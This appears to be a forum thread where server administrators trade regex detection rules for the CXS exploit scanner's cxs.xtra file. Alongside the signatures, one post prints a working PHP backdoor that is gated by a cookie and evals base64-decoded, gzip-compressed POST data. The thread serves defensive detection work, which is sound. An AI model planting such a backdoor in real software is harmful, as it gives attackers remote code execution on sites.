STICKY rules for CXS.XTRA regs.

[mobileappsgallery]

Don't work regall:yahoo\.Com:68\.142\.202\.247

[Sergio]

Don't work regall:yahoo\.Com:68\.142\.202\.247

I have tried and it is working:

Quarantine date:Mon Jun 25 08:37:51 2012
Quarantine file: /quarantine/ftp/owner/cxstest.php.1340631471_1
Quarantine file size: 67 bytes
Original file: /home/owner/public_html/cxstest.php
File owner: owner
FTP Account: owner
FTP IP address: xx.xx.xx.xx
md5sum: 4163ca7b518066623fe073cfd52650b4
Reason:
Regular expression match = [yahoo\.com\:68\.142\.202\.247]
Regular expression match = [yahoo\.Com:68\.142\.202\.247]

As you can see, I have tried with two rules and both worked.

Sergio

[peterelsner]

So, is no one updating this sticky list anymore???

It's been 6 months since the last update, and I know more strings exist that could be inserted here.

[Sergio]

Hello Peterelsner,
if you can contribute, I am more than glad to add any string that you can provide.

I have not posted anymore because by now my servers have not got any attacks with different rules to the ones that I have or the ones that CXS includes.

If you can help, it will be great.

Regards,

Sergio

[peterelsner]

Found a new one that you may want to add. Over the weekend had no less than 150 messages that various gif/jpg/php files were uploaded that had suspicious data in it. They were marked as suspicious only and not quarantined.

Added this to my cxs.xtra file:

regall:quarantine:\$_POST\[\(chr\(112\)\.chr\(49\)\)

Then ran scan on those 4 or 5 users that had the most hits...

result was:

w1655179n.php.1369756806_1) Regular expression match = [\$_POST\[\(chr\(112\)\.chr\(49\)\)] (md5sum:254e27d2d8854a6bc9f9a760f4c52a15)

(dozens of others too). But now they got quarantined.

[Sergio]

Thank you, Peter.

I am adding this to the sticky.

Regards,

Sergio

[qchost]

Another one that came up last night:

Code: Select all

regall:quarantine:second stage dropper
regall:quarantine:killall -9

[Sergio]

Thank you, qchost, I have added these to the sticky.

Regards,

Sergio

[dieter]

Hi all,

Could somebody please help me create a regex for this. I have found it in a couple of sites, and they use it to alter .js files.

if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){echo '<textarea id=areatext>';eval($msg);echo '</textarea>bg';exit;}} exit;

Regards,

Dieter

[Sergio]

The sticky is only for regex that CXS users donate to the forum and not to ask for the creation of one, for this only time, I am generating a regex for you, but please if you need help open a new thread asking for it.

Code: Select all

regall:quaratine:\$msg\=@gzinflate\(@base64_decode\(@str_replace

On the other hand, please read thread viewtopic.php?f=26&t=7341#p21404 that is about .JS files.